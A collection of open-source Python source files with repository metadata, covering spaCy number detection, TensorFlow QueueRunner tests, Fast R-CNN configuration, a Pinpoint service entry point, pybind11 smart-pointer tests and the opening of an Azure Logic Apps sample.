_ordinal_words = [
    "first", "second", "third", "fourth", "fifth", "sixth", "seventh", "eighth",
    "ninth", "tenth", "eleventh", "twelfth", "thirteenth", "fourteenth",
    "fifteenth", "sixteenth", "seventeenth", "eighteenth", "nineteenth",
    "twentieth", "thirtieth", "fortieth", "fiftieth", "sixtieth", "seventieth",
    "eightieth", "ninetieth", "hundredth", "thousandth", "millionth", "billionth",
    "trillionth", "quadrillionth", "gajillionth", "bazillionth"
]
# fmt: on


def like_num(text: str) -> bool:
    """Return True if *text* looks like a number.

    Handles optional sign, digit-group separators and decimal points
    ("10,000.5"), simple fractions ("3/4"), spelled-out cardinals and
    ordinals, and digit ordinals ("5th", "1st", "2nd", "3rd").
    """
    if text.startswith(("+", "-", "±", "~")):
        text = text[1:]
    # Strip group separators and decimal points: "10,000.5" -> "100005".
    text = text.replace(",", "").replace(".", "")
    if text.isdigit():
        return True
    # Simple fractions such as "3/4".
    if text.count("/") == 1:
        num, denom = text.split("/")
        if num.isdigit() and denom.isdigit():
            return True
    text_lower = text.lower()
    if text_lower in _num_words:
        return True
    # Check ordinal number
    if text_lower in _ordinal_words:
        return True
    # Digit ordinals. Fix: previously only the "th" suffix was recognized,
    # which missed "1st", "2nd", "3rd", "22nd", "73rd", "101st", etc.
    if text_lower.endswith(("st", "nd", "rd", "th")):
        if text_lower[:-2].isdigit():
            return True
    return False
# Exported lexical-attribute table: maps the LIKE_NUM attribute to the
# predicate defined above.
LEX_ATTRS = {LIKE_NUM: like_num}
| {
"content_hash": "0dd309d6a8ae26c4e8690bfd06deaa6d",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 82,
"avg_line_length": 35.86363636363637,
"alnum_prop": 0.5754119138149556,
"repo_name": "spacy-io/spaCy",
"id": "fcc7c6bf2dbc0435f17f082165cbca55d286d6ed",
"size": "1579",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "spacy/lang/en/lex_attrs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "567025"
},
{
"name": "C++",
"bytes": "12785"
},
{
"name": "CSS",
"bytes": "57480"
},
{
"name": "Groff",
"bytes": "188349"
},
{
"name": "HTML",
"bytes": "582292"
},
{
"name": "JavaScript",
"bytes": "54065"
},
{
"name": "M4",
"bytes": "11398"
},
{
"name": "Makefile",
"bytes": "256492"
},
{
"name": "Objective-C",
"bytes": "567"
},
{
"name": "PostScript",
"bytes": "460967"
},
{
"name": "Python",
"bytes": "682585"
},
{
"name": "Shell",
"bytes": "95525"
}
],
"symlink_target": ""
} |
"""Tests for QueueRunner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
class QueueRunnerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = qr.create_threads(sess)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testTwoOps(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var0 = tf.Variable(zero64)
count_up_to_3 = var0.count_up_to(3)
var1 = tf.Variable(zero64)
count_up_to_30 = var1.count_up_to(30)
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, [count_up_to_3, count_up_to_30])
threads = qr.create_threads(sess)
tf.global_variables_initializer().run()
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
self.assertEqual(3, var0.eval())
self.assertEqual(30, var1.eval())
def testExceptionsCaptured(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["i fail", "so fail"])
threads = qr.create_threads(sess)
tf.global_variables_initializer().run()
for t in threads:
t.start()
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(2, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
self.assertTrue("Operation not in the graph" in str(exceptions[1]))
def testRealDequeueEnqueue(self):
with self.test_session() as sess:
q0 = tf.FIFOQueue(3, tf.float32)
enqueue0 = q0.enqueue((10.0,))
close0 = q0.close()
q1 = tf.FIFOQueue(30, tf.float32)
enqueue1 = q1.enqueue((q0.dequeue(),))
dequeue1 = q1.dequeue()
qr = tf.train.QueueRunner(q1, [enqueue1])
threads = qr.create_threads(sess)
for t in threads:
t.start()
# Enqueue 2 values, then close queue0.
enqueue0.run()
enqueue0.run()
close0.run()
# Wait for the queue runner to terminate.
for t in threads:
t.join()
# It should have terminated cleanly.
self.assertEqual(0, len(qr.exceptions_raised))
# The 2 values should be in queue1.
self.assertEqual(10.0, dequeue1.eval())
self.assertEqual(10.0, dequeue1.eval())
# And queue1 should now be closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError, "is closed"):
dequeue1.eval()
def testRespectCoordShouldStop(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
# As the coordinator to stop. The queue runner should
# finish immediately.
coord = tf.train.Coordinator()
coord.request_stop()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
coord.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 0.
self.assertEqual(0, var.eval())
def testRequestStopOnException(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["not an op"])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
# The exception should be re-raised when joining.
with self.assertRaisesRegexp(ValueError, "Operation not in the graph"):
coord.join()
def testGracePeriod(self):
with self.test_session() as sess:
# The enqueue will quickly block.
queue = tf.FIFOQueue(2, tf.float32)
enqueue = queue.enqueue((10.0,))
dequeue = queue.dequeue()
qr = tf.train.QueueRunner(queue, [enqueue])
coord = tf.train.Coordinator()
qr.create_threads(sess, coord, start=True)
# Dequeue one element and then request stop.
dequeue.op.run()
time.sleep(0.02)
coord.request_stop()
# We should be able to join because the RequestStop() will cause
# the queue to be closed and the enqueue to terminate.
coord.join(stop_grace_period_secs=0.05)
def testMultipleSessions(self):
with self.test_session() as sess:
with tf.Session() as other_sess:
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
# NOTE that this test does not actually start the threads.
threads = qr.create_threads(sess, coord=coord)
other_threads = qr.create_threads(other_sess, coord=coord)
self.assertEqual(len(threads), len(other_threads))
def testIgnoreMultiStarts(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = []
# NOTE that this test does not actually start the threads.
threads.extend(qr.create_threads(sess, coord=coord))
new_threads = qr.create_threads(sess, coord=coord)
self.assertEqual([], new_threads)
def testThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to, "bad op"])
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
def testName(self):
with tf.name_scope("scope"):
queue = tf.FIFOQueue(10, tf.float32, name="queue")
qr = tf.train.QueueRunner(queue, [tf.no_op()])
self.assertEqual("scope/queue", qr.name)
tf.train.add_queue_runner(qr)
self.assertEqual(1, len(tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS,
"scope")))
def testStartQueueRunners(self):
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
init_op = tf.global_variables_initializer()
qr = tf.train.QueueRunner(queue, [count_up_to])
tf.train.add_queue_runner(qr)
with self.test_session() as sess:
init_op.run()
threads = tf.train.start_queue_runners(sess)
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testStartQueueRunnersNonDefaultGraph(self):
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
graph = tf.Graph()
with graph.as_default():
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
init_op = tf.global_variables_initializer()
qr = tf.train.QueueRunner(queue, [count_up_to])
tf.train.add_queue_runner(qr)
with self.test_session(graph=graph) as sess:
init_op.run()
threads = tf.train.start_queue_runners(sess)
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testQueueRunnerSerializationRoundTrip(self):
    """to_proto()/from_proto() must reconstruct an equivalent QueueRunner."""
    graph = tf.Graph()
    with graph.as_default():
        queue = tf.FIFOQueue(10, tf.float32, name="queue")
        enqueue_op = tf.no_op(name="enqueue")
        close_op = tf.no_op(name="close")
        cancel_op = tf.no_op(name="cancel")
        qr0 = tf.train.QueueRunner(
            queue, [enqueue_op], close_op, cancel_op,
            queue_closed_exception_types=(
                tf.errors.OutOfRangeError, tf.errors.CancelledError))
        qr0_proto = tf.train.QueueRunner.to_proto(qr0)
        qr0_recon = tf.train.QueueRunner.from_proto(qr0_proto)
        # The reconstructed runner resolves ops by name in the current graph,
        # so it must point at the *same* op objects.
        self.assertEqual("queue", qr0_recon.queue.name)
        self.assertEqual(1, len(qr0_recon.enqueue_ops))
        self.assertEqual(enqueue_op, qr0_recon.enqueue_ops[0])
        self.assertEqual(close_op, qr0_recon.close_op)
        self.assertEqual(cancel_op, qr0_recon.cancel_op)
        self.assertEqual(
            (tf.errors.OutOfRangeError, tf.errors.CancelledError),
            qr0_recon.queue_closed_exception_types)
        # Assert we reconstruct an OutOfRangeError for QueueRunners
        # created before QueueRunnerDef had a queue_closed_exception_types field.
        del qr0_proto.queue_closed_exception_types[:]
        qr0_legacy_recon = tf.train.QueueRunner.from_proto(qr0_proto)
        self.assertEqual("queue", qr0_legacy_recon.queue.name)
        self.assertEqual(1, len(qr0_legacy_recon.enqueue_ops))
        self.assertEqual(enqueue_op, qr0_legacy_recon.enqueue_ops[0])
        self.assertEqual(close_op, qr0_legacy_recon.close_op)
        self.assertEqual(cancel_op, qr0_legacy_recon.cancel_op)
        self.assertEqual(
            (tf.errors.OutOfRangeError,),
            qr0_legacy_recon.queue_closed_exception_types)
if __name__ == "__main__":
    # Discover and run every tf.test.TestCase defined in this module.
    tf.test.main()
| {
"content_hash": "4de577bce92379da59564115010987c3",
"timestamp": "",
"source": "github",
"line_count": 282,
"max_line_length": 79,
"avg_line_length": 38.61347517730496,
"alnum_prop": 0.6439526127284415,
"repo_name": "gibiansky/tensorflow",
"id": "9bc2c30285a9246d2e7b4947af866578bf8b4746",
"size": "11579",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/queue_runner_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6963"
},
{
"name": "C",
"bytes": "118477"
},
{
"name": "C++",
"bytes": "14646706"
},
{
"name": "CMake",
"bytes": "111373"
},
{
"name": "CSS",
"bytes": "774"
},
{
"name": "Go",
"bytes": "96398"
},
{
"name": "HTML",
"bytes": "534568"
},
{
"name": "Java",
"bytes": "179112"
},
{
"name": "JavaScript",
"bytes": "13406"
},
{
"name": "Jupyter Notebook",
"bytes": "1833491"
},
{
"name": "Makefile",
"bytes": "23553"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "64592"
},
{
"name": "Protocol Buffer",
"bytes": "152280"
},
{
"name": "Python",
"bytes": "15069371"
},
{
"name": "Shell",
"bytes": "312259"
},
{
"name": "TypeScript",
"bytes": "761620"
}
],
"symlink_target": ""
} |
"""Fast R-CNN config system.
This file specifies default config options for Fast R-CNN. You should not
change values in this file. Instead, you should write a config file (in yaml)
and use cfg_from_file(yaml_file) to load it and override the default options.
Most tools in $ROOT/tools take a --cfg option to specify an override file.
- See tools/{train,test}_net.py for example code that uses cfg_from_file()
- See experiments/cfgs/*.yml for example YAML config override files
"""
import os
import os.path as osp
import numpy as np
# `pip install easydict` if you don't have it
from easydict import EasyDict as edict
__C = edict()
# Consumers can get config by:
#   from fast_rcnn_config import cfg
cfg = __C

#
# Training options
#

__C.TRAIN = edict()

# Scales to use during training (can list multiple scales)
# Each scale is the pixel size of an image's shortest side
__C.TRAIN.SCALES = (600,)

# Max pixel size of the longest side of a scaled input image
__C.TRAIN.MAX_SIZE = 1000

# Images to use per minibatch
__C.TRAIN.IMS_PER_BATCH = 2

# Minibatch size (number of regions of interest [ROIs])
__C.TRAIN.BATCH_SIZE = 128

# Fraction of minibatch that is labeled foreground (i.e. class > 0)
__C.TRAIN.FG_FRACTION = 0.25

# Overlap threshold for a ROI to be considered foreground (if >= FG_THRESH)
__C.TRAIN.FG_THRESH = 0.5

# Overlap threshold for a ROI to be considered background (class = 0 if
# overlap in [LO, HI))
__C.TRAIN.BG_THRESH_HI = 0.5
__C.TRAIN.BG_THRESH_LO = 0.1

# Use horizontally-flipped images during training?
__C.TRAIN.USE_FLIPPED = True

# Train bounding-box regressors
__C.TRAIN.BBOX_REG = True

# Overlap required between a ROI and ground-truth box in order for that ROI to
# be used as a bounding-box regression training example
__C.TRAIN.BBOX_THRESH = 0.5

# Iterations between snapshots
__C.TRAIN.SNAPSHOT_ITERS = 10000

# solver.prototxt specifies the snapshot path prefix, this adds an optional
# infix to yield the path: <prefix>[_<infix>]_iters_XYZ.caffemodel
__C.TRAIN.SNAPSHOT_INFIX = ''

# Use a prefetch thread in roi_data_layer.layer
# So far I haven't found this useful; likely more engineering work is required
__C.TRAIN.USE_PREFETCH = False

#
# Testing options
#

__C.TEST = edict()

# Scales to use during testing (can list multiple scales)
# Each scale is the pixel size of an image's shortest side
__C.TEST.SCALES = (600,)

# Max pixel size of the longest side of a scaled input image
__C.TEST.MAX_SIZE = 1000

# Overlap threshold used for non-maximum suppression (suppress boxes with
# IoU >= this threshold)
__C.TEST.NMS = 0.3

# Experimental: treat the (K+1) units in the cls_score layer as linear
# predictors (trained, eg, with one-vs-rest SVMs).
__C.TEST.SVM = False

# Test using bounding-box regressors
__C.TEST.BBOX_REG = True

#
# MISC
#

# The mapping from image coordinates to feature map coordinates might cause
# some boxes that are distinct in image space to become identical in feature
# coordinates. If DEDUP_BOXES > 0, then DEDUP_BOXES is used as the scale factor
# for identifying duplicate boxes.
# 1/16 is correct for {Alex,Caffe}Net, VGG_CNN_M_1024, and VGG16
__C.DEDUP_BOXES = 1./16.

# Pixel mean values (BGR order) as a (1, 1, 3) array
# These are the values originally used for training VGG16
__C.PIXEL_MEANS = np.array([[[102.9801, 115.9465, 122.7717]]])

# For reproducibility
__C.RNG_SEED = 3

# A small number that's used many times
__C.EPS = 1e-14

# Root directory of project
__C.ROOT_DIR = osp.abspath(osp.join(osp.dirname(__file__), '..', '..'))

# Place outputs under an experiments directory
# (see get_output_dir() below for the full layout)
__C.EXP_DIR = 'default'
def get_output_dir(imdb, net):
    """Return the directory where experimental artifacts are placed.

    The canonical layout is ``<ROOT_DIR>/output/<EXP_DIR>/<imdb.name>``, with
    ``<net.name>`` appended as a final component when ``net`` is not None.
    """
    base = osp.abspath(osp.join(__C.ROOT_DIR, 'output', __C.EXP_DIR, imdb.name))
    return base if net is None else osp.join(base, net.name)
def _merge_a_into_b(a, b):
    """Merge config dictionary a into config dictionary b, clobbering the
    options in b whenever they are also specified in a.

    Raises KeyError for keys absent from b and ValueError on type mismatches;
    nested edicts are merged recursively.
    """
    if type(a) is not edict:
        return

    # `a.items()` / `k in b` instead of the removed-in-Python-3
    # `iteritems()` / `has_key()`; both spellings also work on Python 2.
    for k, v in a.items():
        # a must specify keys that are in b
        if k not in b:
            raise KeyError('{} is not a valid config key'.format(k))

        # the types must match, too
        if type(b[k]) is not type(v):
            raise ValueError(('Type mismatch ({} vs. {}) '
                              'for config key: {}').format(type(b[k]),
                                                           type(v), k))

        # recursively merge dicts
        if type(v) is edict:
            try:
                _merge_a_into_b(a[k], b[k])
            except Exception:
                # Annotate where in the config tree the failure happened,
                # then let the original exception propagate.
                print('Error under config key: {}'.format(k))
                raise
        else:
            b[k] = v
def cfg_from_file(filename):
    """Load a config file and merge it into the default options."""
    import yaml
    with open(filename, 'r') as f:
        # safe_load instead of load: yaml.load() without an explicit Loader is
        # deprecated (PyYAML >= 5.1) and can instantiate arbitrary Python
        # objects from untrusted files. Config overrides here are plain YAML
        # scalars/maps, so the restricted loader is sufficient.
        yaml_cfg = edict(yaml.safe_load(f))

    _merge_a_into_b(yaml_cfg, __C)
| {
"content_hash": "97ebc15a2fbed4a2795b0813e6e89fbe",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 80,
"avg_line_length": 30.029239766081872,
"alnum_prop": 0.6648490749756573,
"repo_name": "MichaelXin/fast-rcnn",
"id": "ee22d8e569f8bfcf0be3472c18f5d99e4cf4b465",
"size": "5384",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "lib/fast_rcnn/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "56"
},
{
"name": "Matlab",
"bytes": "10660"
},
{
"name": "Python",
"bytes": "71104"
},
{
"name": "Shell",
"bytes": "16276"
}
],
"symlink_target": ""
} |
"""Pinpoint Service (Python 3)
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import six
if six.PY3:
    # Wire stdlib logging through Google Cloud Logging at DEBUG level; this
    # branch only runs on the Python 3 runtime.
    import logging
    import google.cloud.logging
    google.cloud.logging.Client().setup_logging(log_level=logging.DEBUG)

from dashboard.pinpoint import dispatcher

# Module-level WSGI application object; presumably referenced by the runtime
# configuration as the service entry point — TODO confirm against app.yaml.
APP = dispatcher.APP
| {
"content_hash": "e5ffab65eb1d0d3df6b95cc28fe63191",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 70,
"avg_line_length": 20.764705882352942,
"alnum_prop": 0.7592067988668555,
"repo_name": "catapult-project/catapult",
"id": "a7d2d573ce6a0f58766810ad1f5db281a765000e",
"size": "515",
"binary": false,
"copies": "6",
"ref": "refs/heads/main",
"path": "dashboard/dashboard/pinpoint/main.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1324"
},
{
"name": "C++",
"bytes": "46069"
},
{
"name": "CSS",
"bytes": "23376"
},
{
"name": "Dockerfile",
"bytes": "1541"
},
{
"name": "Go",
"bytes": "114396"
},
{
"name": "HTML",
"bytes": "12394298"
},
{
"name": "JavaScript",
"bytes": "1559584"
},
{
"name": "Makefile",
"bytes": "1774"
},
{
"name": "Python",
"bytes": "6778695"
},
{
"name": "Shell",
"bytes": "2288"
}
],
"symlink_target": ""
} |
import pytest
from pybind11_tests import ConstructorStats
def test_smart_ptr(capture):
    """Exercise holder types over the MyObject1/2/3 hierarchy exported by
    pybind11_tests, checking ref counts, printed output and C++ side
    constructor statistics."""
    # Object1
    from pybind11_tests import (MyObject1, make_object_1, make_object_2,
                                print_object_1, print_object_2, print_object_3, print_object_4)

    for i, o in enumerate([make_object_1(), make_object_2(), MyObject1(3)], start=1):
        assert o.getRefCount() == 1
        with capture:
            print_object_1(o)
            print_object_2(o)
            print_object_3(o)
            print_object_4(o)
        # Each of the four printers emits one line per call.
        assert capture == "MyObject1[{i}]\n".format(i=i) * 4

    from pybind11_tests import (make_myobject1_1, make_myobject1_2,
                                print_myobject1_1, print_myobject1_2,
                                print_myobject1_3, print_myobject1_4)

    for i, o in enumerate([make_myobject1_1(), make_myobject1_2(), MyObject1(6), 7], start=4):
        print(o)
        with capture:
            # The plain int (7) can only go through the MyObject1 printers;
            # it is implicitly converted by the bound signatures.
            if not isinstance(o, int):
                print_object_1(o)
                print_object_2(o)
                print_object_3(o)
                print_object_4(o)
            print_myobject1_1(o)
            print_myobject1_2(o)
            print_myobject1_3(o)
            print_myobject1_4(o)
        assert capture == "MyObject1[{i}]\n".format(i=i) * (4 if isinstance(o, int) else 8)

    cstats = ConstructorStats.get(MyObject1)
    assert cstats.alive() == 0
    expected_values = ['MyObject1[{}]'.format(i) for i in range(1, 7)] + ['MyObject1[7]'] * 4
    assert cstats.values() == expected_values
    assert cstats.default_constructions == 0
    assert cstats.copy_constructions == 0
    # assert cstats.move_constructions >= 0 # Doesn't invoke any
    assert cstats.copy_assignments == 0
    assert cstats.move_assignments == 0

    # Object2
    from pybind11_tests import (MyObject2, make_myobject2_1, make_myobject2_2,
                                make_myobject3_1, make_myobject3_2,
                                print_myobject2_1, print_myobject2_2,
                                print_myobject2_3, print_myobject2_4)

    for i, o in zip([8, 6, 7], [MyObject2(8), make_myobject2_1(), make_myobject2_2()]):
        print(o)
        with capture:
            print_myobject2_1(o)
            print_myobject2_2(o)
            print_myobject2_3(o)
            print_myobject2_4(o)
        assert capture == "MyObject2[{i}]\n".format(i=i) * 4

    cstats = ConstructorStats.get(MyObject2)
    # One instance (the loop variable from the last iteration) is still alive
    # until `o` is rebound below.
    assert cstats.alive() == 1
    o = None
    assert cstats.alive() == 0
    assert cstats.values() == ['MyObject2[8]', 'MyObject2[6]', 'MyObject2[7]']
    assert cstats.default_constructions == 0
    assert cstats.copy_constructions == 0
    # assert cstats.move_constructions >= 0 # Doesn't invoke any
    assert cstats.copy_assignments == 0
    assert cstats.move_assignments == 0

    # Object3
    from pybind11_tests import (MyObject3, print_myobject3_1, print_myobject3_2,
                                print_myobject3_3, print_myobject3_4)

    for i, o in zip([9, 8, 9], [MyObject3(9), make_myobject3_1(), make_myobject3_2()]):
        print(o)
        with capture:
            print_myobject3_1(o)
            print_myobject3_2(o)
            print_myobject3_3(o)
            print_myobject3_4(o)
        assert capture == "MyObject3[{i}]\n".format(i=i) * 4

    cstats = ConstructorStats.get(MyObject3)
    assert cstats.alive() == 1
    o = None
    assert cstats.alive() == 0
    assert cstats.values() == ['MyObject3[9]', 'MyObject3[8]', 'MyObject3[9]']
    assert cstats.default_constructions == 0
    assert cstats.copy_constructions == 0
    # assert cstats.move_constructions >= 0 # Doesn't invoke any
    assert cstats.copy_assignments == 0
    assert cstats.move_assignments == 0

    # Object and ref
    from pybind11_tests import Object, cstats_ref

    cstats = ConstructorStats.get(Object)
    assert cstats.alive() == 0
    assert cstats.values() == []
    assert cstats.default_constructions == 10
    assert cstats.copy_constructions == 0
    # assert cstats.move_constructions >= 0 # Doesn't invoke any
    assert cstats.copy_assignments == 0
    assert cstats.move_assignments == 0

    cstats = cstats_ref()
    assert cstats.alive() == 0
    assert cstats.values() == ['from pointer'] * 10
    assert cstats.default_constructions == 30
    assert cstats.copy_constructions == 12
    # assert cstats.move_constructions >= 0 # Doesn't invoke any
    assert cstats.copy_assignments == 30
    assert cstats.move_assignments == 0
def test_smart_ptr_refcounting():
    """Delegates to the C++-side ref-counting checks for MyObject1."""
    from pybind11_tests import test_object1_refcounting
    assert test_object1_refcounting()
def test_unique_nodelete():
    """An object held by unique_ptr with a no-op deleter is never destroyed."""
    from pybind11_tests import MyObject4
    o = MyObject4(23)
    assert o.value == 23
    cstats = ConstructorStats.get(MyObject4)
    assert cstats.alive() == 1
    del o
    cstats = ConstructorStats.get(MyObject4)
    assert cstats.alive() == 1  # Leak, but that's intentional
def test_large_holder():
    """A holder type larger than the usual smart pointers still works."""
    from pybind11_tests import MyObject5
    o = MyObject5(5)
    assert o.value == 5
    cstats = ConstructorStats.get(MyObject5)
    assert cstats.alive() == 1
    del o
    assert cstats.alive() == 0
def test_shared_ptr_and_references():
    """Mixing shared_ptr holders with raw references: only holder-backed
    objects can be passed where a holder is required."""
    from pybind11_tests.smart_ptr import SharedPtrRef, A
    s = SharedPtrRef()
    stats = ConstructorStats.get(A)
    assert stats.alive() == 2
    ref = s.ref  # init_holder_helper(holder_ptr=false, owned=false)
    assert stats.alive() == 2
    assert s.set_ref(ref)
    # A bare reference has no shared_ptr holder, so requesting one must fail.
    with pytest.raises(RuntimeError) as excinfo:
        assert s.set_holder(ref)
    assert "Unable to cast from non-held to held instance" in str(excinfo.value)
    copy = s.copy  # init_holder_helper(holder_ptr=false, owned=true)
    assert stats.alive() == 3
    assert s.set_ref(copy)
    assert s.set_holder(copy)
    holder_ref = s.holder_ref  # init_holder_helper(holder_ptr=true, owned=false)
    assert stats.alive() == 3
    assert s.set_ref(holder_ref)
    assert s.set_holder(holder_ref)
    holder_copy = s.holder_copy  # init_holder_helper(holder_ptr=true, owned=true)
    assert stats.alive() == 3
    assert s.set_ref(holder_copy)
    assert s.set_holder(holder_copy)
    del ref, copy, holder_ref, holder_copy, s
    assert stats.alive() == 0
def test_shared_ptr_from_this_and_references():
    """enable_shared_from_this lets a holder be recovered from a reference,
    except when the internal weak_ptr was deliberately broken (bad_wp)."""
    from pybind11_tests.smart_ptr import SharedFromThisRef, B, SharedFromThisVirt
    s = SharedFromThisRef()
    stats = ConstructorStats.get(B)
    assert stats.alive() == 2
    ref = s.ref  # init_holder_helper(holder_ptr=false, owned=false, bad_wp=false)
    assert stats.alive() == 2
    assert s.set_ref(ref)
    assert s.set_holder(ref)  # std::enable_shared_from_this can create a holder from a reference
    bad_wp = s.bad_wp  # init_holder_helper(holder_ptr=false, owned=false, bad_wp=true)
    assert stats.alive() == 2
    assert s.set_ref(bad_wp)
    with pytest.raises(RuntimeError) as excinfo:
        assert s.set_holder(bad_wp)
    assert "Unable to cast from non-held to held instance" in str(excinfo.value)
    copy = s.copy  # init_holder_helper(holder_ptr=false, owned=true, bad_wp=false)
    assert stats.alive() == 3
    assert s.set_ref(copy)
    assert s.set_holder(copy)
    holder_ref = s.holder_ref  # init_holder_helper(holder_ptr=true, owned=false, bad_wp=false)
    assert stats.alive() == 3
    assert s.set_ref(holder_ref)
    assert s.set_holder(holder_ref)
    holder_copy = s.holder_copy  # init_holder_helper(holder_ptr=true, owned=true, bad_wp=false)
    assert stats.alive() == 3
    assert s.set_ref(holder_copy)
    assert s.set_holder(holder_copy)
    del ref, bad_wp, copy, holder_ref, holder_copy, s
    assert stats.alive() == 0
    # The virtual factory hands out the same shared instance every time.
    z = SharedFromThisVirt.get()
    y = SharedFromThisVirt.get()
    assert y is z
def test_move_only_holder():
    """A move-only (non-copyable) holder type is supported by pybind11."""
    from pybind11_tests.smart_ptr import TypeWithMoveOnlyHolder
    a = TypeWithMoveOnlyHolder.make()
    stats = ConstructorStats.get(TypeWithMoveOnlyHolder)
    assert stats.alive() == 1
    del a
    assert stats.alive() == 0
def test_smart_ptr_from_default():
    """Loading a custom holder from an object owned by the default holder
    must raise at the binding layer."""
    from pybind11_tests.smart_ptr import HeldByDefaultHolder
    instance = HeldByDefaultHolder()
    with pytest.raises(RuntimeError) as excinfo:
        HeldByDefaultHolder.load_shared_ptr(instance)
    # Check the exception message via excinfo.value: str(excinfo) itself is
    # the file:line location on modern pytest, not the error text, so the
    # previous `in str(excinfo)` check could never match the message.
    assert ("Unable to load a custom holder type from a default-holder instance"
            in str(excinfo.value))
def test_shared_ptr_gc():
    """#187: issue involving std::shared_ptr<> return value policy & garbage collection"""
    from pybind11_tests.smart_ptr import ElementList, ElementA
    el = ElementList()
    for i in range(10):
        el.add(ElementA(i))
    # Force a collection: the elements must survive because the C++ list
    # holds shared_ptr references to them.
    pytest.gc_collect()
    for i, v in enumerate(el.get()):
        assert i == v.value()
| {
"content_hash": "0d16e06920d767c2ee3dbab7fc14bff7",
"timestamp": "",
"source": "github",
"line_count": 248,
"max_line_length": 97,
"avg_line_length": 35.20967741935484,
"alnum_prop": 0.6368529546495648,
"repo_name": "ilyaraz/falconn_polygon",
"id": "144180d8ca97633e18111c5ab14b72edb2fc7b0b",
"size": "8732",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "external/pybind11/tests/test_smart_ptr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "902270"
},
{
"name": "C++",
"bytes": "405121"
},
{
"name": "Makefile",
"bytes": "12494"
},
{
"name": "Python",
"bytes": "37328"
},
{
"name": "Shell",
"bytes": "890"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.logic import LogicManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-logic
# USAGE
python enable_a_workflow.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
